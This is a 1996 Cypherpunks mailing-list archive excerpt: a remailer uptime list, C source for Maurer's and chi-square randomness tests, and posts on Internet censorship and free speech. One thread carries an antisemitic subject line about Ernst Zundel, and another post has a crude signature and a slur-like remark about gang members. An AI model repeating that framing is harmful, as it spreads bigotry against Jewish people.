$remailer{'nymrod'} = '<nymrod@nym.alias.net> alpha pgp';
catalyst@netcom.com is _not_ a remailer.
lmccarth@ducie.cs.umass.edu is _not_ a remailer.
usura@replay.com is _not_ a remailer.

Groups of remailers sharing a machine or operator:
(c2 robo hroller alpha)
(gondolin gondonym)
(flame hacktic replay)
(alumni portal)
(vishnu spook wmono)

Use "premail -getkeys pgpkeys@kiwi.cs.berkeley.edu" to get PGP keys
for the remailers. Fingering this address works too.

Note: The remailer list now includes information for the alpha
nymserver.

Last update: Mon 5 Feb 96 6:47:36 PST
remailer  email address                        history  latency  uptime
-----------------------------------------------------------------------
ford     remailer@bi-node.zerberus.de     +--+++++..-+  8:06:08  99.94%
portal   hfinney@shell.portal.com         *#+*########      :42  99.94%
alumni   hal@alumni.caltech.edu           +-+#+ ---*##    27:01  99.81%
pamphlet pamphlet@idiom.com               +++++++ ++++    44:57  99.80%
alpha    alias@alpha.c2.org               ***** ***-**    18:20  99.72%
hroller  hroller@c2.org                   ###### ##-##    12:23  99.63%
mix      mixmaster@remail.obscura.com     ++-+- -----+  1:25:43  99.56%
gondolin mix@remail.gondolin.org                 ----   7:30:27  99.47%
flame    remailer@flame.alias.net         --+++ + -++-  1:17:58  99.41%
ecafe    cpunk@remail.ecafe.org           ##*## + ##*#     1:46  99.41%
c2       remail@c2.org                    ***** *** **    23:58  99.29%
nymrod   nymrod@nym.alias.net             ***+*** ***      7:40  99.18%
gondonym alias@nym.gondolin.org                   *--   4:42:54  98.55%
shinobi  remailer@shinobi.alias.net        #### # *#-#    33:56  98.34%
extropia remail@extropia.wimsey.com       _.__.-.---   21:13:22  97.85%
vishnu   mixmaster@vishnu.alias.net        +*+****--+     37:03  96.15%
penet    anon@anon.penet.fi               __.-__  _ .  44:43:59  92.95%
rahul    homer@rahul.net                  ** ## ****##     4:49  99.66%
hacktic  remailer@utopia.hacktic.nl          ** + ****     8:01  89.57%
replay   remailer@replay.com                 *- +****      6:41  80.79%
tjava    remailer@tjava.com               *#####           2:46  32.29%

   History key
     * # response in less than 5 minutes.
     * * response in less than 1 hour.
     * + response in less than 4 hours.
     * - response in less than 24 hours.
     * . response in more than 1 day.
     * _ response came back too late (more than 2 days).

   cpunk
          A major class of remailers. Supports Request-Remailing-To:
          field.
          
   eric
          A variant of the cpunk style. Uses Anon-Send-To: instead.
          
   penet
          The third class of remailers (at least for right now). Uses
          X-Anon-To: in the header.
          
   pgp
          Remailer supports encryption with PGP. A period after the
          keyword means that the short name, rather than the full email
          address, should be used as the encryption key ID.
          
   hash
          Supports ## pasting, so anything can be put into the headers of
          outgoing messages.
          
   ksub
          Remailer always kills subject header, even in non-pgp mode.
          
   nsub
          Remailer always preserves subject header, even in pgp mode.
          
   latent
          Supports Matt Ghio's Latent-Time: option.
          
   cut
          Supports Matt Ghio's Cutmarks: option.
          
   post
          Post to Usenet using Post-To: or Anon-Post-To: header.
          
   ek
          Encrypt responses in reply blocks using Encrypt-Key: header.
          
   special
          Accepts only pgp encrypted messages.
          
   mix
          Can accept messages in Mixmaster format.
          
   reord
          Attempts to foil traffic analysis by reordering messages. Note:
          I'm relying on the word of the remailer operator here, and
          haven't verified the reord info myself.

   mon
          Remailer has been known to monitor contents of private email.
          
   filter
          Remailer has been known to filter messages based on content. If
          not listed in conjunction with mon, then only messages destined
          for public forums are subject to filtering.
          

Raph Levien




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Charlie Mullins <cmullins@cwa.com>
Date: Mon, 5 Feb 1996 23:09:45 +0800
To: sethf@MIT.EDU
Subject: Re: THE JEWS (ALL of them!) Try to kick Ernst Zundel off Usenet!!
In-Reply-To: <9602031850.AA18675@frumious-bandersnatch.MIT.EDU>
Message-ID: <31161B4A.794BDF32@cwa.com>
MIME-Version: 1.0
Content-Type: text/plain


sethf@MIT.EDU wrote:
> 
>         HOLD YOUR FLAMES! That message looks like a troll designed to
> set us all off arguing. DON'T FEED THE TROLL.
> 
> --
> Seth Finkelstein                                sethf@mit.edu
> Disclaimer : I am not the Lorax. I speak only for myself.
> Freedom of Expression URL http://www.mit.edu:8001/activities/safe/home.html


I took it as a rather humorous parody.

--

Charlie Mullins




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr. Dimitri Vulis)
Date: Mon, 5 Feb 1996 21:17:01 +0800
To: andreas@artcom.de (Andreas Bogk)
Subject: Re: verification of randomness
In-Reply-To: <y8apwbulbrd.fsf@horten.artcom.de>
Message-ID: <X0qTiD60w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


andreas@artcom.de (Andreas Bogk) writes:
> I've built a random number generator based on the noise of a Zener
> diode. Now I'd like to verify it's correct operation. I'd be very
> grateful if someone could point me to existing software for randomness
> tests or additional tests not mentioned in Knuth.

Dear Andreas,

Here are a couple of tests:

1. Maurer's test (very good, published later than Knuth)

/************************************************************

Ueli Maurer's randomness test
(C) 1993 Dimitri Vulis, all rights reserved

For details, see:
Ueli M. Maurer. ``A Universal Statistical Test for Random Bit
Generators.'' {\em Journal of Cryptology,\/} {\bf5} (1992), pp.~89--105.

*************************************************************/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <math.h>

void rndinit(void);
unsigned char rndgetbyte(void);

/*

We produce a stream of random bits. We look at them in blocks of L
bits at a time. Maurer uses 8-bit bytes  s_n, recommends 6 <= L <= 16.

*/

#define L 8
/* 2**L */
#define vv 256

int main(void) {
/*
the count of s_n's random bytes
*/
long n=1;
/*
fTU is the average \log_2(a_n),
where a_n is the number of bytes since the previous occurrence of the
same value. a_n = n for first occurrence (hopefully skipped using Q below)
*/
double fTU=0.0;
/*
Every time we obtain a random byte, we save its position n here,
so we can computer a_n, the number of bytes since last occurence
*/
static long lastseen[vv];
/*
the number of bytes to skip before computing
compute the average, hoping that all possible byte values will
occur and lastseen will be non-zero. M recommends Q >= 10 * 2**L.
*/
long Q;
/*
the number of bytes to use to compute fTU.
M recommends K as large as possible >= 1000 * 2**L
*/
long K;
/*
E(L) is the expected value of fTU for a truly random sequence
*/
#define E 7.1836656
/*
V(L) is the variance of a_n for a truly random sequence (from M; table below)
*/
#define V 3.238
/*
If you decide to change L:
L       E               V
6       5.2177052       2.954
7       6.1962507       3.125
8       7.1836656       3.238
9       8.1764248       3.311
10      9.1723243       3.356
11      10.170032       3.384
12      11.168765       3.401
13      12.168070       3.410
14      13.167693       3.416
15      14.167488       3.419
16      15.167379       3.421
*/
/*
c(L,K) from M (13)
*/
double C;
/*
standard deviation of a truly random sequence from M (14)
*/
double sigma;
/*
fTU's distance in sigmas from the expected value
*/
double y;
/*
rho is the rejection rate, the probability that a sequence is bad
*/
double rho;

unsigned char r;

printf("Enter Q>=%-7ld:",10L*vv);   fflush(stdout); scanf("%ld",&Q);
printf("Enter K>=%-7ld:",1000L*vv); fflush(stdout); scanf("%ld",&K);

C=0.7-0.8/L+(1.6+12.8/L)*pow(K,-4.0/L); /* (13) */
/* M: C close to 0.6 for L=8 */
sigma=C*pow(V/K,0.5);           /* (14) */
/* M: grows as 1/\sqrt{K} */

/* initialize lastseen to 0 */
memset((void*)lastseen,0,sizeof(lastseen));

rndinit();

for (; n<Q+K; n++) {
 r=rndgetbyte();
 if (n>Q)
  fTU+=log((double)(n-lastseen[r]));
 lastseen[r]=n;
 }

/* compute the average and convert from natural log to log_2 */
fTU/=K*log(2.0);
y=fabs((fTU-E)/sigma);

rho=erf(-y/sqrt(2.0))+1;

printf("fTU=%lg, %lg*%lg from  e.v. %lg, rho=%lg --- %s\n",
fTU,y,sigma,E,rho,
(rho < 0.0001 ? "unacceptable" :
(rho < 0.001 ?  "marginal" :
"acceptable")));

return(0);
}

/*
Use C library's pseudo-random number generator
*/

void rndinit(void)
{
srand(1);
}

unsigned char rndgetbyte(void) {
static unsigned state=0;
static int rrr;

if (state^=1) {
 rrr=rand();
 return(unsigned char)(rrr & 0xff);
 }
else
 return(unsigned char)((rrr>>8) & 0xff);
}

2. You probably have this one:

/* ***************************************************************
 * chi.c --
 *
 * Copyright 1993 Peter K. Boucher
 * Permission to use, copy, modify, and distribute this
 * software and its documentation for any purpose and without
 * fee is hereby granted, provided that the above copyright
 * notice appear in all copies.
 *
 * Usage:  chi [input_file [output_file]]
 *
 * This program counts the occurances of each character in a file
 * and notifies the user when a the distribution is too ragged or
 * too uniform.
 *
 * Because the chance of getting byte B after byte A should be 1:256
 * (for all A's and B's), the program also checks that the successors
 * to each byte are randomly distributed.  This means that for each byte
 * value (0 - 255) that occurs in the text, a count is kept of the
 * byte value that followed in the text, and the frequency distribution
 * of these succeeding bytes is also checked.
 *
 */

#include <stdio.h>

#define NUM_BYTES 256L
#define BUFSIZE 8192
#define min_nps 5.0
#define min_testable (NUM_BYTES*min_nps)

#define V01     (205.33) /*  1% chance it's less */
#define V05     (219.09) /*  5% chance it's less */
#define V25     (239.39) /* 25% chance it's less */
#define V50     (254.33) /* 50% chance it's less */
#define V75     (269.88) /* 75% chance it's less */
#define V95     (293.16) /* 95% chance it's less */
#define V99     (310.57) /* 99% chance it's less */

#define min_chichi5 (20.0*min_nps) /* min prob. 5% */
#define min_chichi3 (4.0*min_nps) /* min prob. 25% */

#ifdef DEBUG
#define CFNAME "chi.dat"
#define min_chichi7 (100.0*min_nps) /* min prob. 1% */
#endif

#define AB(X)  (((X) >= 0.0) ? (X) : -(X))

double cnt[NUM_BYTES] = {0.0}; /* should be all zeros. */
double successors[NUM_BYTES][NUM_BYTES] = {{0.0}}; /* should be all zeros. */

static unsigned char buf[BUFSIZE];
static FILE *ifp, *ofp;

FILE *
my_fopen(file, type)
char *file, *type;
{
  FILE *fp;

  if ((fp = fopen(file, type)) == NULL) {
      (void)fprintf(stderr, "Can't open '%s' for '%s'\n", file, type);
      exit(1);
  }
  return(fp);
}

double
get_V(n,Y)
double n;
double *Y;
{
#define k (256)
#define p (1.0/256.0)
    double sum = 0.0;
    double divider = (n*p);
    double tmp;
    long i;

    for (i=0; i<k; i++) {
        tmp = Y[i]/divider;
        sum += (tmp*Y[i]);
    }
    return( sum - n );
}

double
chichi3(n,cgt_75,c50_75,c25_50,clt_25)
double  n,cgt_75,c50_75,c25_50,clt_25;
{
    double sum = (cgt_75*cgt_75)/(0.25*n);
    sum += (c50_75*c50_75)/(0.25*n);
    sum += (c25_50*c25_50)/(0.25*n);
    sum += (clt_25*clt_25)/(0.25*n);
    return( sum - n );
}

int
check_chichi3(n,cgt_75,c50_75,c25_50,clt_25)
double        n,cgt_75,c50_75,c25_50,clt_25;
{
#define C3_01 0.1148
#define C3_05 0.3518
#define C3_25 1.213
#define C3_75 4.108
#define C3_95 7.815
#define C3_99 11.34
    double V3;
    int check = 0;

    if (n < min_chichi3) {
        return( 0 );
    }
    if ((V3 = chichi3(n,cgt_75,c50_75,c25_50,clt_25)) > C3_75) {
        check++;
        if (V3 > C3_95) {
            check++;
            if (V3 > C3_99) {
                check++;
            }
        }
    } else if (V3 < C3_25) {
        check--;
        if (V3 < C3_05) {
            check--;
            if (V3 < C3_01) {
                check--;
            }
        }
    }
    return(check);
}

double
chichi5(n,cgt_95,c75_95,c50_75,c25_50,c05_25,clt_05)
double  n,cgt_95,c75_95,c50_75,c25_50,c05_25,clt_05;
{
    double sum = (cgt_95*cgt_95)/(0.05*n);
    sum += (c75_95*c75_95)/(0.20*n);
    sum += (c50_75*c50_75)/(0.25*n);
    sum += (c25_50*c25_50)/(0.25*n);
    sum += (c05_25*c05_25)/(0.20*n);
    sum += (clt_05*clt_05)/(0.05*n);
    return( sum - n );
}

int
check_chichi5(n,cgt_95,c75_95,c50_75,c25_50,c05_25,clt_05)
double        n,cgt_95,c75_95,c50_75,c25_50,c05_25,clt_05;
{
#define C5_01 0.5543
#define C5_05 1.1455
#define C5_25 2.675
#define C5_75 6.626
#define C5_95 11.07
#define C5_99 15.09
    double V5;
    int check = 0;

    if (n < min_chichi5) {
        return( check_chichi3(n,cgt_95+c75_95,c50_75,c25_50,c05_25+clt_05) );
    }
    if ((V5 = chichi5(n,cgt_95,c75_95,c50_75,c25_50,c05_25,clt_05)) > C5_75) {
        check++;
        if (V5 > C5_95) {
            check++;
            if (V5 > C5_99) {
                check++;
            }
        }
    } else if (V5 < C5_25) {
        check--;
        if (V5 < C5_05) {
            check--;
            if (V5 < C5_01) {
                check--;
            }
        }
    }
    return(check);
}

#ifdef DEBUG
double
chichi7(n,cgt_99,c95_99,c75_95,c50_75,c25_50,c05_25,c01_05,clt_01)
double        n,cgt_99,c95_99,c75_95,c50_75,c25_50,c05_25,c01_05,clt_01;
{
    double sum = (cgt_99*cgt_99)/(0.01*n);

    sum += (c95_99*c95_99)/(0.04*n);
    sum += (c75_95*c75_95)/(0.20*n);
    sum += (c50_75*c50_75)/(0.25*n);
    sum += (c25_50*c25_50)/(0.25*n);
    sum += (c05_25*c05_25)/(0.20*n);
    sum += (c01_05*c01_05)/(0.04*n);
    sum += (clt_01*clt_01)/(0.01*n);
    return( sum - n );
}

int
check_chichi7(n,cgt_99,c95_99,c75_95,c50_75,c25_50,c05_25,c01_05,clt_01)
double        n,cgt_99,c95_99,c75_95,c50_75,c25_50,c05_25,c01_05,clt_01;
{
#define C7_01 1.239
#define C7_05 2.167
#define C7_25 4.255
#define C7_75 9.037
#define C7_95 14.07
#define C7_99 18.48
    double V7;
    int check = 0;

    if (n < min_chichi7) {
        return( check_chichi5(n,cgt_99+c95_99,c75_95,c50_75,
                                c25_50,c05_25,c01_05+clt_01) );
    }
    if ((V7=chichi7(n,cgt_99,c95_99,c75_95,c50_75,
                      c25_50,c05_25,c01_05,clt_01)) > C7_75) {
        check++;
        if (V7 > C7_95) {
            check++;
            if (V7 > C7_99) {
                check++;
            }
        }
    } else if (V7 < C7_25) {
        check--;
        if (V7 < C7_05) {
            check--;
            if (V7 < C7_01) {
                check--;
            }
        }
    }
    return(check);
}
#endif

double
fill_arrays()
{
   double size=0.0;
   long ch,next,l,i;

   if ((ch = getc(ifp)) != EOF) { /* prime the pump */
       cnt[ch] = size = 1.0;
       while ((l = fread(buf, 1, BUFSIZE, ifp)) > 0) {
           for (i=0; i<l; i++) {
               size++;
               next = buf[i];
               cnt[next]++;
               successors[ch][next]++;
               ch = next;
           }
       }
   }
   fclose(ifp);
   return( size );
}

void
chi_2_test()
{
   long         i;
   double       suc_tests = 0.0;
   double       suc_highest = -1.0;
   double       suc_lowest = 1000000000.0;
   double       suc_gt_99 = 0.0;
   double       suc_95_99 = 0.0;
   double       suc_75_95 = 0.0;
   double       suc_50_75 = 0.0;
   double       suc_25_50 = 0.0;
   double       suc_05_25 = 0.0;
   double       suc_01_05 = 0.0;
   double       suc_lt_01 = 0.0;
   double       V;
   double       size;
   char         *desc = NULL;
#ifdef DEBUG
   double       tocc_tests = 0.0;
   double       tocc_highest = -1.0;
   double       tocc_lowest = 1000000000.0;
   double       tocc_gt_99 = 0.0;
   double       tocc_95_99 = 0.0;
   double       tocc_75_95 = 0.0;
   double       tocc_50_75 = 0.0;
   double       tocc_25_50 = 0.0;
   double       tocc_05_25 = 0.0;
   double       tocc_01_05 = 0.0;
   double       tocc_lt_01 = 0.0;
   double       tsuc_tests = 0.0;
   double       tsuc_highest = -1.0;
   double       tsuc_lowest = 1000000000.0;
   double       tsuc_gt_99 = 0.0;
   double       tsuc_95_99 = 0.0;
   double       tsuc_75_95 = 0.0;
   double       tsuc_50_75 = 0.0;
   double       tsuc_25_50 = 0.0;
   double       tsuc_05_25 = 0.0;
   double       tsuc_01_05 = 0.0;
   double       tsuc_lt_01 = 0.0;
   FILE *chi_dat=fopen(CFNAME, "r");
#endif

   if ((size = fill_arrays()) < min_testable) {
       fprintf(ofp, "File too small (%.0f) to meaningfully analyze\n",
               size);
       exit(0);
   }

#ifdef DEBUG
   if (chi_dat != NULL) {
       char dummy[128];
       fscanf(chi_dat, "%lf", &tocc_tests);
       fgets(dummy, 128, chi_dat);
       fscanf(chi_dat, "%lf", &tocc_highest);
       fgets(dummy, 128, chi_dat);
       fscanf(chi_dat, "%lf", &tocc_lowest);
       fgets(dummy, 128, chi_dat);
       fscanf(chi_dat, "%lf", &tocc_gt_99);
       fgets(dummy, 128, chi_dat);
       fscanf(chi_dat, "%lf", &tocc_95_99);
       fgets(dummy, 128, chi_dat);
       fscanf(chi_dat, "%lf", &tocc_75_95);
       fgets(dummy, 128, chi_dat);
       fscanf(chi_dat, "%lf", &tocc_50_75);
       fgets(dummy, 128, chi_dat);
       fscanf(chi_dat, "%lf", &tocc_25_50);
       fgets(dummy, 128, chi_dat);
       fscanf(chi_dat, "%lf", &tocc_05_25);
       fgets(dummy, 128, chi_dat);
       fscanf(chi_dat, "%lf", &tocc_01_05);
       fgets(dummy, 128, chi_dat);
       fscanf(chi_dat, "%lf", &tocc_lt_01);
       fgets(dummy, 128, chi_dat);
       fscanf(chi_dat, "%lf", &tsuc_tests);
       fgets(dummy, 128, chi_dat);
       fscanf(chi_dat, "%lf", &tsuc_highest);
       fgets(dummy, 128, chi_dat);
       fscanf(chi_dat, "%lf", &tsuc_lowest);
       fgets(dummy, 128, chi_dat);
       fscanf(chi_dat, "%lf", &tsuc_gt_99);
       fgets(dummy, 128, chi_dat);
       fscanf(chi_dat, "%lf", &tsuc_95_99);
       fgets(dummy, 128, chi_dat);
       fscanf(chi_dat, "%lf", &tsuc_75_95);
       fgets(dummy, 128, chi_dat);
       fscanf(chi_dat, "%lf", &tsuc_50_75);
       fgets(dummy, 128, chi_dat);
       fscanf(chi_dat, "%lf", &tsuc_25_50);
       fgets(dummy, 128, chi_dat);
       fscanf(chi_dat, "%lf", &tsuc_05_25);
       fgets(dummy, 128, chi_dat);
       fscanf(chi_dat, "%lf", &tsuc_01_05);
       fgets(dummy, 128, chi_dat);
       fscanf(chi_dat, "%lf", &tsuc_lt_01);
       fgets(dummy, 128, chi_dat);
       fclose(chi_dat);
   }
#endif

   if ((V = get_V(size,cnt)) > V99) {
       desc = ": *******Non-random (hi)\n";
#ifdef DEBUG
       tocc_gt_99++;
#endif
   } else if (V > V95) {
       desc = ": Suspect (hi)\n";
#ifdef DEBUG
       tocc_95_99++;
#endif
   } else if (V > V75) {
       desc = ": Acceptible (hi)\n";
#ifdef DEBUG
       tocc_75_95++;
#endif
   } else if (V > V50) {
       desc = ": Excellent (hi) !!!!!!!\n";
#ifdef DEBUG
       tocc_50_75++;
#endif
   } else if (V > V25) {
       desc = ": Excellent (lo) !!!!!!!\n";
#ifdef DEBUG
       tocc_25_50++;
#endif
   } else if (V > V05) {
       desc = ": Acceptible (lo)\n";
#ifdef DEBUG
       tocc_05_25++;
#endif
   } else if (V > V01) {
       desc = ": Suspect (lo)\n";
#ifdef DEBUG
       tocc_01_05++;
#endif
   } else {
       desc = ": *******Non-random (lo)\n";
#ifdef DEBUG
       tocc_lt_01++;
#endif
   }

   fprintf(ofp, "Occurance  V = %.2f (n = %.0f)%s", V, size, desc);


#ifdef DEBUG
   tocc_tests++;
   if (V < tocc_lowest) tocc_lowest = V;
   if (V > tocc_highest) tocc_highest = V;
#endif

   for (i=0; i<NUM_BYTES; i++) {
       if (cnt[i] >= min_testable) {
           if ((V = get_V(cnt[i],successors[i])) > V99) {
               suc_gt_99++;
           } else if (V > V95) {
               suc_95_99++;
           } else if (V > V75) {
               suc_75_95++;
           } else if (V > V50) {
               suc_50_75++;
           } else if (V > V25) {
               suc_25_50++;
           } else if (V > V05) {
               suc_05_25++;
           } else if (V > V01) {
               suc_01_05++;
           } else {
               suc_lt_01++;
           }
           suc_tests++;
           if (V < suc_lowest) suc_lowest = V;
           if (V > suc_highest) suc_highest = V;
       }
   }
   if (suc_tests > 0.0) {
       fprintf(ofp,
               "Successor Vd = %.2f %.2f %.2f %.2f %.2f %.2f %.2f %.2f\n",
                suc_gt_99*100.0/suc_tests,
                suc_95_99*100.0/suc_tests,
                suc_75_95*100.0/suc_tests,
                suc_50_75*100.0/suc_tests,
                suc_25_50*100.0/suc_tests,
                suc_05_25*100.0/suc_tests,
                suc_01_05*100.0/suc_tests,
                suc_lt_01*100.0/suc_tests);
       fprintf(ofp,
               "               deviation %d, (lowest = %.2f, highest = %.2f)\n",
               check_chichi5(suc_tests,
                             suc_gt_99+suc_95_99,suc_75_95,suc_50_75,
                             suc_25_50,suc_05_25,suc_01_05+suc_lt_01),
               suc_lowest, suc_highest);
   }

#ifdef DEBUG
   tsuc_tests += suc_tests;
   if (suc_lowest < tsuc_lowest) tsuc_lowest = suc_lowest;
   if (suc_highest > tsuc_highest) tsuc_highest = suc_highest;
   tsuc_gt_99 += suc_gt_99;
   tsuc_95_99 += suc_95_99;
   tsuc_75_95 += suc_75_95;
   tsuc_50_75 += suc_50_75;
   tsuc_25_50 += suc_25_50;
   tsuc_05_25 += suc_05_25;
   tsuc_01_05 += suc_01_05;
   tsuc_lt_01 += suc_lt_01;

   chi_dat = my_fopen(CFNAME, "w");
   fprintf(chi_dat, "%-14.0f - Total number of occurance tests\n",
           tocc_tests);
   fprintf(chi_dat, "%-14.2f - Highest V from an occurance test\n",
           tocc_highest);
   fprintf(chi_dat, "%-14.2f - Lowest V from an occurance test\n",
           tocc_lowest);
   fprintf(chi_dat, "%-14.0f - Number of occurance tests above  %.2f\n",
           tocc_gt_99, V99);
   fprintf(chi_dat, "%-14.0f - Number of occurance tests %.2f - %.2f\n",
           tocc_95_99, V95, V99);
   fprintf(chi_dat, "%-14.0f - Number of occurance tests %.2f - %.2f\n",
           tocc_75_95, V75, V95);
   fprintf(chi_dat, "%-14.0f - Number of occurance tests %.2f - %.2f\n",
           tocc_50_75, V50, V75);
   fprintf(chi_dat, "%-14.0f - Number of occurance tests %.2f - %.2f\n",
           tocc_25_50, V25, V50);
   fprintf(chi_dat, "%-14.0f - Number of occurance tests %.2f - %.2f\n",
           tocc_05_25, V05, V25);
   fprintf(chi_dat, "%-14.0f - Number of occurance tests %.2f - %.2f\n",
           tocc_01_05, V01, V05);
   fprintf(chi_dat, "%-14.0f - Number of occurance tests below  %.2f\n",
           tocc_lt_01, V01);
   fprintf(chi_dat, "%-14.0f - Total number of successor tests\n",
           tsuc_tests);
   fprintf(chi_dat, "%-14.2f - Highest V from an successor test\n",
           tsuc_highest);
   fprintf(chi_dat, "%-14.2f - Lowest V from an successor test\n",
           tsuc_lowest);
   fprintf(chi_dat, "%-14.0f - Number of successor tests above  %.2f\n",
           tsuc_gt_99, V99);
   fprintf(chi_dat, "%-14.0f - Number of successor tests %.2f - %.2f\n",
           tsuc_95_99, V95, V99);
   fprintf(chi_dat, "%-14.0f - Number of successor tests %.2f - %.2f\n",
           tsuc_75_95, V75, V95);
   fprintf(chi_dat, "%-14.0f - Number of successor tests %.2f - %.2f\n",
           tsuc_50_75, V50, V75);
   fprintf(chi_dat, "%-14.0f - Number of successor tests %.2f - %.2f\n",
           tsuc_25_50, V25, V50);
   fprintf(chi_dat, "%-14.0f - Number of successor tests %.2f - %.2f\n",
           tsuc_05_25, V05, V25);
   fprintf(chi_dat, "%-14.0f - Number of successor tests %.2f - %.2f\n",
           tsuc_01_05, V01, V05);
   fprintf(chi_dat, "%-14.0f - Number of successor tests below  %.2f\n",
           tsuc_lt_01, V01);
   fprintf(chi_dat,
           "Occurance Vd = %.2f %.2f %.2f %.2f %.2f %.2f %.2f %.2f",
            tocc_gt_99*100.0/tocc_tests,
            tocc_95_99*100.0/tocc_tests,
            tocc_75_95*100.0/tocc_tests,
            tocc_50_75*100.0/tocc_tests,
            tocc_25_50*100.0/tocc_tests,
            tocc_05_25*100.0/tocc_tests,
            tocc_01_05*100.0/tocc_tests,
            tocc_lt_01*100.0/tocc_tests);
   fprintf(chi_dat, " (deviation %d)\n",
           check_chichi7(tocc_tests,
                         tocc_gt_99,tocc_95_99,tocc_75_95,tocc_50_75,
                         tocc_25_50,tocc_05_25,tocc_01_05,tocc_lt_01));
   if (tsuc_tests > 0.0) {
       fprintf(chi_dat,
               "Successor Vd = %.2f %.2f %.2f %.2f %.2f %.2f %.2f %.2f",
                tsuc_gt_99*100.0/tsuc_tests,
                tsuc_95_99*100.0/tsuc_tests,
                tsuc_75_95*100.0/tsuc_tests,
                tsuc_50_75*100.0/tsuc_tests,
                tsuc_25_50*100.0/tsuc_tests,
                tsuc_05_25*100.0/tsuc_tests,
                tsuc_01_05*100.0/tsuc_tests,
                tsuc_lt_01*100.0/tsuc_tests);
       fprintf(chi_dat, " (deviation %d)\n",
               check_chichi7(tsuc_tests,
                             tsuc_gt_99,tsuc_95_99,tsuc_75_95,tsuc_50_75,
                             tsuc_25_50,tsuc_05_25,tsuc_01_05,tsuc_lt_01));
   }
   fclose(chi_dat);
#endif
}

int
main(argc,argv)
int argc;
char **argv;
{
   ifp = (argc > 1) ? my_fopen(argv[1],"rb") : stdin;
   ofp = (argc > 2) ? my_fopen(argv[2],"w") : stdout;
   chi_2_test();

   return(0);
}


---

Dr. Dimitri Vulis
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: attila <attila@primenet.com>
Date: Tue, 6 Feb 1996 08:08:36 +0800
To: Mike Ang <mang@lisgar.edu.on.ca>
Subject: Re: "Nations see Internet.." continued
In-Reply-To: <199602041718.MAA05257@plethora.lisgar.edu.on.ca>
Message-ID: <Pine.BSD.3.91.960205065909.8568G-100000@usr1.primenet.com>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 4 Feb 1996, Mike Ang wrote:

> 
> Comparing crypto to guns works in the sense that the "bad guys" will 
> always be able to have access to them.  However, I for one support gun 
> control but do not support mandatory limits on crypto.  Where I live,
> there are no theats that justify allowing everyone to carry guns 
>
	well, I'll tell you what, we'll export 10,000 of our inner city 
    gang members north; then you think about leaving _all_ weapons in
    the hands of the central state who increasingly is failing to provide 
    adequate protection for the weak members of its society.

>- the 
> threat to privacy and freedom of speech justifies allowing everyone to 
> use strong crypto.  You can use a gun to deprive another person of their 
> life - what harm can you do another with PGP?  Perhaps you can harm them 
> by being able to spread hate propaganda, but I don't think that that is a 
> strong enough argument.
> 
> 	- Mike.
> 
> If you've got to flame me, do it by email.
> 

__________________________________________________________________________
    go not unto usenet for advice, for the inhabitants thereof will say:
      yes, and no, and maybe, and I don't know, and fuck-off.
_________________________________________________________________ attila__

    To be a ruler of men, you need at least 12 inches....
    There is no safety this side of the grave.  Never was; never will be.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Mon, 5 Feb 1996 20:18:43 +0800
To: cypherpunks@toad.com
Subject: China Censors
Message-ID: <199602051207.HAA25830@pipe1.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


The NY Times today reports on China's new rules for censoring 
the Internet.


URL: http://www.nytimes.com/yr/mo/day/front/china-censor.html







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: bob bruen <bruen@wizard.mit.edu>
Date: Mon, 5 Feb 1996 20:56:03 +0800
To: cypherpunks@toad.com
Subject: Boston Globe and Nazism
Message-ID: <Pine.LNX.3.91.960205073224.5014A-100000@wizard.mit.edu>
MIME-Version: 1.0
Content-Type: text/plain



I thought this clip would be of interest. Just in case you were not sure 
which directionship censorship on the net was heading. Anyone remember Joe
McCarthy? 

                            bob
-----------------------------------------------------------------------------
Boston Sunday Globe page 74, February 4, 1996.
Business Review section, Highlights of the week: Jan.28-Feb.3.


Goosestepping in cyberspace

The politics of the Internet make strange bedfellows. When the German
government moved to bar German Internet users from downloading material
on a neo-Nazi net site, the free-speech-in-cyberspace crowd reacted by
downloading the stuff and posting it all over the net. Joseph Goebels
would be proud.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: m5@dev.tivoli.com (Mike McNally)
Date: Mon, 5 Feb 1996 22:01:28 +0800
To: Stephan Mohr <stephan.mohr@uni-tuebingen.de>
Subject: free speach and the government
In-Reply-To: <2.2.16.19960203234059.2eb7ed1c@mailserv.uni-tuebingen.de>
Message-ID: <9602051343.AA16098@alpha>
MIME-Version: 1.0
Content-Type: text/plain



Stephan Mohr writes:
 > Well, maybe my imagination isn't strong enough to make my point. But do
 > you fighter for free speech, in principle, think that nothing, really
 > nothing, shouldn't be prevented of being published? And by being
 > published, I mean published in the net, not at loompanics (who knows
 > loompanics?).

Well, if it's OK to publish via Loompanics I don't see what your point
is.  Anybody psychotic enough to poison a municipal water supply won't
be deterred by being denied on-line access to information.

Remember that far, far more people walk in and out of bookstores and
libraries every day than log into a computer connected to the
Internet.

______c_____________________________________________________________________
Mike M Nally * Tiv^H^H^H IBM * Austin TX    * I want more, I want more,
       m5@tivoli.com * m101@io.com          * I want more, I want more ...
      <URL:http://www.io.com/~m101>         *_______________________________




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: m5@dev.tivoli.com (Mike McNally)
Date: Mon, 5 Feb 1996 22:09:42 +0800
To: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Subject: Re: Imminent Death of Usenet Predicted
In-Reply-To: <01I0SEGNWJAYA0UTZ4@mbcl.rutgers.edu>
Message-ID: <9602051345.AA19001@alpha>
MIME-Version: 1.0
Content-Type: text/plain



E. ALLEN SMITH writes:
 > 	Now, this can all be fought in the courts and will likely be defeated..
 > but it would still cause some problems. Am I completely incorrect, or do the
 > programmers on here and elsewhere need to start coming up with a better way to
 > do things?

InterNIC does what it does by general agreement.  It has no special
dispensation from a deity to control internet addressing.

______c_____________________________________________________________________
Mike M Nally * Tiv^H^H^H IBM * Austin TX    * I want more, I want more,
       m5@tivoli.com * m101@io.com          * I want more, I want more ...
